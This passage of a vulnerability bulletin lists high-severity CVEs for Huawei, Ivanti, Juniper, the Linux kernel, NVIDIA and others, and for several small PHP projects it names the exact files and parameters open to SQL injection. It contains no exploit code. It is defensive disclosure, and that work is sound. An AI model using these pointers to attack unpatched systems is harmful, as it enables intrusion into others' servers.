huawei -- emuiDenial of Service (DoS) vulnerability in the DMS module. Successful exploitation of this vulnerability will affect availability.2024-01-167.5CVE-2023-52098
psirt@huawei.com
psirt@huawei.com
huawei -- emuiVulnerability of foreground service restrictions being bypassed in the NMS module. Successful exploitation of this vulnerability may affect service confidentiality.2024-01-167.5CVE-2023-52099
psirt@huawei.com
psirt@huawei.com
huawei -- emuiVulnerability of parameters being not verified in the WMS module. Successful exploitation of this vulnerability may affect service confidentiality.2024-01-167.5CVE-2023-52102
psirt@huawei.com
psirt@huawei.com
huawei -- emuiVulnerability of parameters being not verified in the WMS module. Successful exploitation of this vulnerability may affect service confidentiality.2024-01-167.5CVE-2023-52104
psirt@huawei.com
psirt@huawei.com
huawei -- emuiVulnerability of permissions being not strictly verified in the WMS module. Successful exploitation of this vulnerability may affect service confidentiality.2024-01-167.5CVE-2023-52107
psirt@huawei.com
psirt@huawei.com
huawei -- emuiVulnerability of process priorities being raised in the ActivityManagerService module. Successful exploitation of this vulnerability will affect availability.2024-01-167.5CVE-2023-52108
psirt@huawei.com
psirt@huawei.com
huawei -- emuiVulnerability of trust relationships being inaccurate in distributed scenarios. Successful exploitation of this vulnerability may affect service confidentiality.2024-01-167.5CVE-2023-52109
psirt@huawei.com
psirt@huawei.com
huawei -- emuiAuthorization vulnerability in the BootLoader module. Successful exploitation of this vulnerability may affect service integrity.2024-01-167.5CVE-2023-52111
psirt@huawei.com
psirt@huawei.com
huawei -- emuilaunchAnyWhere vulnerability in the ActivityManagerService module. Successful exploitation of this vulnerability will affect availability.2024-01-167.5CVE-2023-52113
psirt@huawei.com
psirt@huawei.com
huawei -- emuiData confidentiality vulnerability in the ScreenReader module. Successful exploitation of this vulnerability may affect service integrity.2024-01-167.5CVE-2023-52114
psirt@huawei.com
psirt@huawei.com
huawei -- emuiPermission management vulnerability in the multi-screen interaction module. Successful exploitation of this vulnerability may cause service exceptions of the device.2024-01-167.5CVE-2023-52116
psirt@huawei.com
psirt@huawei.com
huawei -- harmonyosThe DownloadProviderMain module has a vulnerability in API permission verification. Successful exploitation of this vulnerability may affect integrity and availability.2024-01-169.1CVE-2023-52106
psirt@huawei.com
psirt@huawei.com
huawei -- harmonyosThe Celia Keyboard module has a vulnerability in access control. Successful exploitation of this vulnerability may affect availability.2024-01-167.5CVE-2023-52100
psirt@huawei.com
psirt@huawei.com
huawei -- harmonyosThe nearby module has a privilege escalation vulnerability. Successful exploitation of this vulnerability may affect availability.2024-01-167.5CVE-2023-52105
psirt@huawei.com
psirt@huawei.com
huawei -- harmonyosThe sensor module has an out-of-bounds access vulnerability.Successful exploitation of this vulnerability may affect availability.2024-01-167.5CVE-2023-52110
psirt@huawei.com
psirt@huawei.com
huawei -- harmonyosThe iaware module has a Use-After-Free (UAF) vulnerability. Successful exploitation of this vulnerability may affect the system functions.2024-01-167.5CVE-2023-52115
psirt@huawei.com
psirt@huawei.com
human_resource_integrated_system -- human_resource_integrated_systemA vulnerability was found in code-projects Human Resource Integrated System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file update_personal_info.php. The manipulation of the argument sex leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250574 is the identifier assigned to this vulnerability.2024-01-129.8CVE-2024-0469
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
human_resource_integrated_system -- human_resource_integrated_systemA vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been classified as critical. This affects an unknown part of the file /admin_route/inc_service_credits.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250575.2024-01-129.8CVE-2024-0470
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
human_resource_integrated_system -- human_resource_integrated_systemA vulnerability was found in code-projects Human Resource Integrated System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin_route/dec_service_credits.php. The manipulation of the argument date leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250576.2024-01-129.8CVE-2024-0471
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
hypr -- workforce_accessImproper Input Validation vulnerability in HYPR Workforce Access on Windows allows Path Traversal.This issue affects Workforce Access: before 8.7.2024-01-167CVE-2023-5097
security@hypr.com
hypr -- workforce_accessImproper Link Resolution Before File Access ('Link Following') vulnerability in HYPR Workforce Access on MacOS allows User-Controlled Filename.This issue affects Workforce Access: before 8.7.2024-01-167.2CVE-2023-6336
security@hypr.com
ibm -- app_connect_enterpriseIBM App Connect Enterprise 11.0.0.1 through 11.0.0.24 and 12.0.1.0 through 12.0.11.0 could allow a remote attacker to obtain sensitive information or cause a denial of service due to improper restriction of excessive authentication attempts. IBM X-Force ID: 279143.2024-01-189.1CVE-2024-22317
psirt@us.ibm.com
psirt@us.ibm.com
ibm -- openpages_with_watsonIBM OpenPages with Watson 8.3 and 9.0 could allow remote attacker to bypass security restrictions, caused by insufficient authorization checks. By authenticating as an OpenPages user and using non-public APIs, an attacker could exploit this vulnerability to bypass security and gain unauthorized administrative access to the application. IBM X-Force ID: 264005.2024-01-198.8CVE-2023-40683
psirt@us.ibm.com
psirt@us.ibm.com
intel -- intel_hotkey_services_for_windows_10_for_intel_nuc_p14e_laptop_element_software_installersImproper access control in some Intel HotKey Services for Windows 10 for Intel NUC P14E Laptop Element software installers before version 1.1.45 may allow an authenticated user to potentially enable denial of service via local access.2024-01-197.3CVE-2023-32544
secure@intel.com
intel -- intel_nuc_8_compute_element_bios_firmwareImproper input validation in some Intel NUC 8 Compute Element BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.2024-01-197.5CVE-2023-42766
secure@intel.com
intel -- intel_nuc_bios_firmwareImproper input validation for some Intel NUC BIOS firmware before version JY0070 may allow a privileged user to potentially enable escalation of privilege via local access.2024-01-197.5CVE-2023-28738
secure@intel.com
intel -- intel_nuc_bios_firmwareImproper input validation for some Intel NUC BIOS firmware before version QN0073 may allow a privileged user to potentially enable escalation of privilege via local access.2024-01-197.5CVE-2023-28743
secure@intel.com
intel -- intel_nuc_bios_firmwareImproper input validation for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access.2024-01-197.5CVE-2023-29495
secure@intel.com
intel -- intel_nuc_bios_firmwareImproper input validation in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.2024-01-197.5CVE-2023-38587
secure@intel.com
intel -- intel_nuc_bios_firmwareImproper buffer restrictions in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.2024-01-197.5CVE-2023-42429
secure@intel.com
intel -- intel_nuc_pro_software_suite_configuration_tool_software_installersUncontrolled search path in some Intel NUC Pro Software Suite Configuration Tool software installers before version 3.0.0.6 may allow an authenticated user to potentially enable denial of service via local access.2024-01-197.9CVE-2023-32272
secure@intel.com
intumit_inc. -- smartrobot
 
Intumit inc. SmartRobot's web framwork has a remote code execution vulnerability. An unauthorized remote attacker can exploit this vulnerability to execute arbitrary commands on the remote server.2024-01-159.8CVE-2024-0552
twcert@cert.org.tw
ivanti -- connect_secureA command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.2024-01-129.1CVE-2024-21887
support@hackerone.com
ivanti -- connect_secureAn authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.2024-01-128.2CVE-2023-46805
support@hackerone.com
judging_management_system -- judging_management_systemSQL Injection vulnerability in oretnom23 Judging Management System v1.0, allows remote attackers to execute arbitrary code and obtain sensitive information via sub_event_id parameter in sub_event_stat_update.php.2024-01-129.8CVE-2023-30014
cve@mitre.org
judging_management_system -- judging_management_systemSQL Injection vulnerability in oretnom23 Judging Management System v1.0, allows remote attackers to execute arbitrary code and obtain sensitive information via txtsearch parameter in review_search.php.2024-01-129.8CVE-2023-30015
cve@mitre.org
judging_management_system -- judging_management_systemSQL Injection vulnerability in oretnom23 Judging Management System v1.0, allows remote attackers to execute arbitrary code and obtain sensitive information via sub_event_id parameter in sub_event_details_edit.php.2024-01-129.8CVE-2023-30016
cve@mitre.org
juniper -- junosAn Out-of-bounds Write vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS), or Remote Code Execution (RCE) and obtain root privileges on the device. This issue is caused by use of an insecure function allowing an attacker to overwrite arbitrary memory. This issue affects Juniper Networks Junos OS SRX Series and EX Series: * Junos OS versions earlier than 20.4R3-S9; * Junos OS 21.2 versions earlier than 21.2R3-S7; * Junos OS 21.3 versions earlier than 21.3R3-S5; * Junos OS 21.4 versions earlier than 21.4R3-S5; * Junos OS 22.1 versions earlier than 22.1R3-S4; * Junos OS 22.2 versions earlier than 22.2R3-S3; * Junos OS 22.3 versions earlier than 22.3R3-S2; * Junos OS 22.4 versions earlier than 22.4R2-S2, 22.4R3.2024-01-129.8CVE-2024-21591
sirt@juniper.net
sirt@juniper.net
juniper -- junosAn Improper Validation of Syntactic Correctness of Input vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). If an attacker sends high rate of specific ICMP traffic to a device with VXLAN configured, this causes a deadlock of the PFE and results in the device becoming unresponsive. A manual restart will be required to recover the device. This issue only affects EX4100, EX4400, EX4600, QFX5000 Series devices. This issue affects: Juniper Networks Junos OS * 21.4R3 versions earlier than 21.4R3-S4; * 22.1R3 versions earlier than 22.1R3-S3; * 22.2R2 versions earlier than 22.2R3-S1; * 22.3 versions earlier than 22.3R2-S2, 22.3R3; * 22.4 versions earlier than 22.4R2; * 23.1 versions earlier than 23.1R2.2024-01-127.5CVE-2024-21595
sirt@juniper.net
sirt@juniper.net
juniper -- junosAn Exposure of Resource to Wrong Sphere vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series allows an unauthenticated, network-based attacker to bypass the intended access restrictions. In an Abstracted Fabric (AF) scenario if routing-instances (RI) are configured, specific valid traffic destined to the device can bypass the configured lo0 firewall filters as it's received in the wrong RI context. This issue affects Juniper Networks Junos OS on MX Series: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S3; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R3; * 22.3 versions earlier than 22.3R2.2024-01-127.5CVE-2024-21597
sirt@juniper.net
sirt@juniper.net
juniper -- junosA Double Free vulnerability in the flow processing daemon (flowd) of Juniper Networks Junos OS on SRX Series allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). In a remote access VPN scenario, if a "tcp-encap-profile" is configured and a sequence of specific packets is received, a flowd crash and restart will be observed. This issue affects Juniper Networks Junos OS on SRX Series: * All versions earlier than 20.4R3-S8; * 21.2 versions earlier than 21.2R3-S6; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S3; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3.2024-01-127.5CVE-2024-21606
sirt@juniper.net
sirt@juniper.net
juniper -- junosA Missing Release of Memory after Effective Lifetime vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). In a Juniper Flow Monitoring (jflow) scenario route churn that causes BGP next hops to be updated will cause a slow memory leak and eventually a crash and restart of rpd. Thread level memory utilization for the areas where the leak occurs can be checked using the below command: user@host> show task memory detail | match so_in so_in6 28 32 344450 11022400 344760 11032320 so_in 8 16 1841629 29466064 1841734 29467744 This issue affects: Junos OS * 21.4 versions earlier than 21.4R3; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R3. Junos OS Evolved * 21.4-EVO versions earlier than 21.4R3-EVO; * 22.1-EVO versions earlier than 22.1R3-EVO; * 22.2-EVO versions earlier than 22.2R3-EVO. This issue does not affect: Juniper Networks Junos OS versions earlier than 21.4R1. Juniper Networks Junos OS Evolved versions earlier than 21.4R1.2024-01-127.5CVE-2024-21611
sirt@juniper.net
sirt@juniper.net
juniper -- junosAn Improper Check for Unusual or Exceptional Conditions vulnerability in Routing Protocol Daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based, unauthenticated attacker to cause rpd to crash, leading to Denial of Service (DoS). On all Junos OS and Junos OS Evolved platforms, when NETCONF and gRPC are enabled, and a specific query is executed via Dynamic Rendering (DREND), rpd will crash and restart. Continuous execution of this specific query will cause a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS * 22.2 versions earlier than 22.2R2-S2, 22.2R3; * 22.3 versions earlier than 22.3R2, 22.3R3. Juniper Networks Junos OS Evolved * 22.2 versions earlier than 22.2R2-S2-EVO, 22.2R3-EVO; * 22.3 versions earlier than 22.3R2-EVO, 22.3R3-EVO. This issue does not affect Juniper Networks: Junos OS versions earlier than 22.2R1; Junos OS Evolved versions earlier than 22.2R1-EVO.2024-01-127.5CVE-2024-21614
sirt@juniper.net
sirt@juniper.net
juniper -- junosAn Improper Validation of Syntactic Correctness of Input vulnerability in Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause Denial of Service (DoS). On all Junos OS MX Series and SRX Series platforms, when SIP ALG is enabled, and a specific SIP packet is received and processed, NAT IP allocation fails for genuine traffic, which causes Denial of Service (DoS). Continuous receipt of this specific SIP ALG packet will cause a sustained DoS condition. NAT IP usage can be monitored by running the following command. user@srx> show security nat resource-usage source-pool <source_pool_name> Pool name: source_pool_name .. Address Factor-index Port-range Used Avail Total Usage X.X.X.X 0 Single Ports 50258 52342 62464 96% <<<<< - Alg Ports 0 2048 2048 0% This issue affects: Juniper Networks Junos OS on MX Series and SRX Series * All versions earlier than 21.2R3-S6; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R1-S1, 23.2R2.2024-01-127.5CVE-2024-21616
sirt@juniper.net
sirt@juniper.net
juniper -- junos_os_evolvedA NULL Pointer Dereference vulnerability in Juniper Networks Junos OS Evolved on ACX7024, ACX7100-32C and ACX7100-48L allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). If a specific IPv4 UDP packet is received and sent to the Routing Engine (RE) packetio crashes and restarts which causes a momentary traffic interruption. Continued receipt of such packets will lead to a sustained DoS. This issue does not happen with IPv6 packets. This issue affects Juniper Networks Junos OS Evolved on ACX7024, ACX7100-32C and ACX7100-48L: * 21.4-EVO versions earlier than 21.4R3-S6-EVO; * 22.1-EVO versions earlier than 22.1R3-S5-EVO; * 22.2-EVO versions earlier than 22.2R2-S1-EVO, 22.2R3-EVO; * 22.3-EVO versions earlier than 22.3R2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions earlier than 21.4R1-EVO.2024-01-127.5CVE-2024-21602
sirt@juniper.net
sirt@juniper.net
juniper -- junos_os_evolvedAn Allocation of Resources Without Limits or Throttling vulnerability in the kernel of Juniper Networks Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). If a high rate of specific valid packets are processed by the routing engine (RE) this will lead to a loss of connectivity of the RE with other components of the chassis and thereby a complete and persistent system outage. Please note that a carefully designed lo0 firewall filter will block or limit these packets which should prevent this issue from occurring. The following log messages can be seen when this issue occurs: <host> kernel: nf_conntrack: nf_conntrack: table full, dropping packet This issue affects Juniper Networks Junos OS Evolved: * All versions earlier than 20.4R3-S7-EVO; * 21.2R1-EVO and later versions; * 21.4-EVO versions earlier than 21.4R3-S5-EVO; * 22.1-EVO versions earlier than 22.1R3-S2-EVO; * 22.2-EVO versions earlier than 22.2R3-EVO; * 22.3-EVO versions earlier than 22.3R2-EVO; * 22.4-EVO versions earlier than 22.4R2-EVO.2024-01-127.5CVE-2024-21604
sirt@juniper.net
sirt@juniper.net
juniper -- junos_os_evolvedAn Improper Handling of Syntactically Invalid Structure vulnerability in Object Flooding Protocol (OFP) service of Juniper Networks Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). On all Junos OS Evolved platforms, when specific TCP packets are received on an open OFP port, the OFP crashes leading to a restart of Routine Engine (RE). Continuous receipt of these specific TCP packets will lead to a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS Evolved * All versions earlier than 21.2R3-S7-EVO; * 21.3 versions earlier than 21.3R3-S5-EVO ; * 21.4 versions earlier than 21.4R3-S5-EVO; * 22.1 versions earlier than 22.1R3-S4-EVO; * 22.2 versions earlier than 22.2R3-S3-EVO ; * 22.3 versions earlier than 22.3R3-EVO; * 22.4 versions earlier than 22.4R2-EVO, 22.4R3-EVO.2024-01-127.5CVE-2024-21612
sirt@juniper.net
sirt@juniper.net
juniper -- paragon_active_assurance_control_centerAn Improper Access Control vulnerability in the Juniper Networks Paragon Active Assurance Control Center allows an unauthenticated network-based attacker to access reports without authenticating, potentially containing sensitive configuration information. A feature was introduced in version 3.1.0 of the Paragon Active Assurance Control Center which allows users to selectively share account data. By exploiting this vulnerability, it is possible to access reports without being logged in, resulting in the opportunity for malicious exfiltration of user data. Note that the Paragon Active Assurance Control Center SaaS offering is not affected by this issue. This issue affects Juniper Networks Paragon Active Assurance versions 3.1.0, 3.2.0, 3.2.2, 3.3.0, 3.3.1, 3.4.0. This issue does not affect Juniper Networks Paragon Active Assurance versions earlier than 3.1.0.2024-01-127.5CVE-2024-21589
sirt@juniper.net
sirt@juniper.net
jupyter-lsp -- jupyterlab-lspjupyter-lsp is a coding assistance tool for JupyterLab (code navigation + hover suggestions + linters + autocompletion + rename) using Language Server Protocol. Installations of jupyter-lsp running in environments without configured file system access control (on the operating system level), and with jupyter-server instances exposed to non-trusted network are vulnerable to unauthorised access and modification of file system beyond the jupyter root directory. This issue has been patched in version 2.2.2 and all users are advised to upgrade. Users unable to upgrade should uninstall jupyter-lsp.2024-01-187.3CVE-2024-22415
security-advisories@github.com
security-advisories@github.com
jupyterlab -- jupyterlabJupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. Users of JupyterLab who click on a malicious link may get their `Authorization` and `XSRFToken` tokens exposed to a third party when running an older `jupyter-server` version. JupyterLab versions 4.1.0b2, 4.0.11, and 3.6.7 are patched. No workaround has been identified, however users should ensure to upgrade `jupyter-server` to version 2.7.2 or newer which includes a redirect vulnerability fix.2024-01-197.6CVE-2024-22421
security-advisories@github.com
security-advisories@github.com
kashipara -- billing_softwareA vulnerability classified as critical was found in Kashipara Billing Software 1.0. Affected by this vulnerability is an unknown functionality of the file buyer_detail_submit.php of the component HTTP POST Request Handler. The manipulation of the argument gstn_no leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250597 was assigned to this vulnerability.2024-01-139.8CVE-2024-0492
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kashipara -- billing_softwareA vulnerability, which was classified as critical, has been found in Kashipara Billing Software 1.0. Affected by this issue is some unknown functionality of the file submit_delivery_list.php of the component HTTP POST Request Handler. The manipulation of the argument customer_details leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250598 is the identifier assigned to this vulnerability.2024-01-139.8CVE-2024-0493
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kashipara -- billing_softwareA vulnerability, which was classified as critical, was found in Kashipara Billing Software 1.0. This affects an unknown part of the file material_bill.php of the component HTTP POST Request Handler. The manipulation of the argument itemtypeid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250599.2024-01-139.8CVE-2024-0494
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kashipara -- billing_softwareA vulnerability has been found in Kashipara Billing Software 1.0 and classified as critical. This vulnerability affects unknown code of the file party_submit.php of the component HTTP POST Request Handler. The manipulation of the argument party_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250600.2024-01-139.8CVE-2024-0495
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kashipara -- billing_softwareA vulnerability was found in Kashipara Billing Software 1.0 and classified as critical. This issue affects some unknown processing of the file item_list_edit.php of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250601 was assigned to this vulnerability.2024-01-139.8CVE-2024-0496
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
lenovo -- vantage
 
A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker to bypass integrity checks and execute arbitrary code with elevated privileges.2024-01-197.8CVE-2023-6043
psirt@lenovo.com
linux -- kernelA use-after-free flaw was found in the Linux Kernel. When a disk is removed, bdi_unregister is called to stop further write-back and waits for associated delayed work to complete. However, wb_inode_writeback_end() may schedule bandwidth estimation work after this has completed, which can result in the timer attempting to access the recently freed bdi_writeback.2024-01-157.8CVE-2024-0562
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
linux -- kernelA memory leak flaw was found in the Linux kernel's io_uring functionality in how a user registers a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then frees it. This flaw allows a local user to crash or potentially escalate their privileges on the system.2024-01-167.8CVE-2024-0582
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
linux -- kernelAn out-of-bounds memory write flaw was found in the Linux kernel's Transport Layer Security functionality in how a user calls a function splice with a ktls socket as the destination. This flaw allows a local user to crash or potentially escalate their privileges on the system.2024-01-177CVE-2024-0646
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
live555 -- live555A heap-use-after-free vulnerability was found in live555 version 2023.05.10 while handling the SETUP.2024-01-129.8CVE-2023-37117
cve@mitre.org
cve@mitre.org
mergen_software -- quality_management_systemImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mergen Software Quality Management System allows SQL Injection.This issue affects Quality Management System: before v1.2.2024-01-189.8CVE-2023-5806
iletisim@usom.gov.tr
mintplex-labs -- anything-llmAnythingLLM is an application that turns any document, resource, or piece of content into context that any LLM can use as references during chatting. In versions prior to commit `08d33cfd8` an unauthenticated API route (file export) can allow attacker to crash the server resulting in a denial of service attack. The "data-export" endpoint is used to export files using the filename parameter as user input. The endpoint takes the user input, filters it to avoid directory traversal attacks, fetches the file from the server, and afterwards deletes it. An attacker can trick the input filter mechanism to point to the current directory, and while attempting to delete it the server will crash as there is no error-handling wrapper around it. Moreover, the endpoint is public and does not require any form of authentication, resulting in an unauthenticated Denial of Service issue, which crashes the instance using a single HTTP packet. This issue has been addressed in commit `08d33cfd8`. Users are advised to upgrade. There are no known workarounds for this vulnerability.2024-01-197.5CVE-2024-22422
security-advisories@github.com
security-advisories@github.com
mongodb -- c_driverWhen calling bson_utf8_validate on some inputs a loop with an exit condition that cannot be reached may occur, i.e. an infinite loop. This issue affects All MongoDB C Driver versions prior to versions 1.25.0.20 24-01-127.5CVE-2023-0437
cna@mongodb.com
montonio -- montonio_for_woocommerceServer-Side Request Forgery (SSRF) vulnerability in Montonio Montonio for WooCommerce, Wpopal Wpopal Core Features, AMO for WP - Membership Management ArcStone wp-amo, Long Watch Studio WooVirtualWallet - A virtual wallet for WooCommerce, Long Watch Studio WooVIP - Membership plugin for WordPress and WooCommerce, Long Watch Studio WooSupply - Suppliers, Supply Orders and Stock Management, Squidesma Theme Minifier, Paul Clark Styles styles, Designmodo Inc. WordPress Page Builder - Qards, Philip M. Hofer (Frumph) PHPFreeChat, Arun Basil Lal Custom Login Admin Front-end CSS, Team Agence-Press CSS Adder By Agence-Press, Unihost Confirm Data, deano1987 AMP Toolbox amp-toolbox, Arun Basil Lal Admin CSS MU.This issue affects Montonio for WooCommerce: from n/a through 6.0.1; Wpopal Core Features: from n/a through 1.5.8; ArcStone: from n/a through 4.6.6; WooVirtualWallet - A virtual wallet for WooCommerce: from n/a through 2.2.1; WooVIP - Membership plugin for WordPress and WooCommerce: from n/a through 1.4.4; WooSupply - Suppliers, Supply Orders and Stock Management: from n/a through 1.2.2; Theme Minifier: from n/a through 2.0; Styles: from n/a through 1.2.3; WordPress Page Builder - Qards: from n/a through 1.0.5; PHPFreeChat: from n/a through 0.2.8; Custom Login Admin Front-end CSS: from n/a through 1.4.1; CSS Adder By Agence-Press: from n/a through 1.5.0; Confirm Data: from n/a through 1.0.7; AMP Toolbox: from n/a through 2.1.1; Admin CSS MU: from n/a through 2.6.2024-01-198.2CVE-2022-40700
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
audit@patchstack.com
netfilter -- netfilter
 
An out-of-bounds access vulnerability involving netfilter was reported and fixed as: f1082dd31fe4 (netfilter: nf_tables: Reject tables of unsupported family); While creating a new netfilter table, lack of a safeguard against invalid nf_tables family (pf) values within `nf_tables_newtable` function enables an attacker to achieve out-of-bounds access.2024-01-127.8CVE-2023-6040
security@ubuntu.com
security@ubuntu.com
security@ubuntu.com
netvision_information -- airpassNetVision Information airPASS has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.2024-01-157.5CVE-2023-48383
twcert@cert.org.tw
nextcloud -- security-advisoriesNextcloud Global Site Selector is a tool which allows you to run multiple small Nextcloud instances and redirect users to the right server. A problem in the password verification method allows an attacker to authenticate as another user. It is recommended that the Nextcloud Global Site Selector is upgraded to version 1.4.1, 2.1.2, 2.3.4 or 2.4.5. There are no known workarounds for this issue.2024-01-189.6CVE-2024-22212
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 BMC contains a vulnerability in the host KVM daemon, where an unauthenticated attacker may cause stack memory corruption by sending a specially crafted network packet. A successful exploit of this vulnerability may lead to arbitrary code execution, denial of service, information disclosure, and data tampering.2024-01-129.8CVE-2023-31024
psirt@nvidia.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 baseboard management controller (BMC) contains a vulnerability in the host KVM daemon, where an unauthenticated attacker may cause a stack overflow by sending a specially crafted network packet. A successful exploit of this vulnerability may lead to arbitrary code execution, denial of service, information disclosure, and data tampering.2024-01-129.8CVE-2023-31029
psirt@nvidia.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 BMC contains a vulnerability in the host KVM daemon, where an unauthenticated attacker may cause a stack overflow by sending a specially crafted network packet. A successful exploit of this vulnerability may lead to arbitrary code execution, denial of service, information disclosure, and data tampering.2024-01-129.8CVE-2023-31030
psirt@nvidia.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 BMC contains a vulnerability where a user may cause a missing authentication issue for a critical function by an adjacent network . A successful exploit of this vulnerability may lead to escalation of privileges, code execution, denial of service, information disclosure, and data tampering.2024-01-128CVE-2023-31033
psirt@nvidia.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 BMC contains a vulnerability where an attacker may cause an LDAP user injection. A successful exploit of this vulnerability may lead to information disclosure.2024-01-127.5CVE-2023-31025
psirt@nvidia.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 SBIOS contains a vulnerability where a user may cause a heap-based buffer overflow by local access. A successful exploit of this vulnerability may lead to code execution, denial of service, information disclosure, and data tampering.2024-01-127.8CVE-2023-31031
psirt@nvidia.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 SBIOS contains a vulnerability where a local attacker can cause input validation checks to be bypassed by causing an integer overflow. A successful exploit of this vulnerability may lead to denial of service, information disclosure, and data tampering.2024-01-127.8CVE-2023-31034
psirt@nvidia.com
nvidia -- dgx_a100_firmwareNVIDIA DGX A100 SBIOS contains a vulnerability where an attacker may cause an SMI callout vulnerability that could be used to execute arbitrary code at the SMM level. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, and information disclosure.2024-01-127.8CVE-2023-31035
psirt@nvidia.com
nvidia -- triton_inference_serverNVIDIA Triton Inference Server for Linux and Windows contains a vulnerability where, when it is launched with the non-default command line option --model-control explicit, an attacker may use the model load API to cause a relative path traversal. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.2024-01-128.8CVE-2023-31036
psirt@nvidia.com
online_faculty_clearance -- online_faculty_clearanceA vulnerability classified as critical has been found in code-projects Online Faculty Clearance 1.0. This affects an unknown part of the file delete_faculty.php of the component HTTP GET Request Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250569 was assigned to this vulnerability.2024-01-129.8CVE-2024-0464
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
online_faculty_clearance_system -- online_faculty_clearance_systemA vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been classified as critical. Affected is an unknown function of the file deactivate.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250566 is the identifier assigned to this vulnerability.2024-01-129.8CVE-2024-0461
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
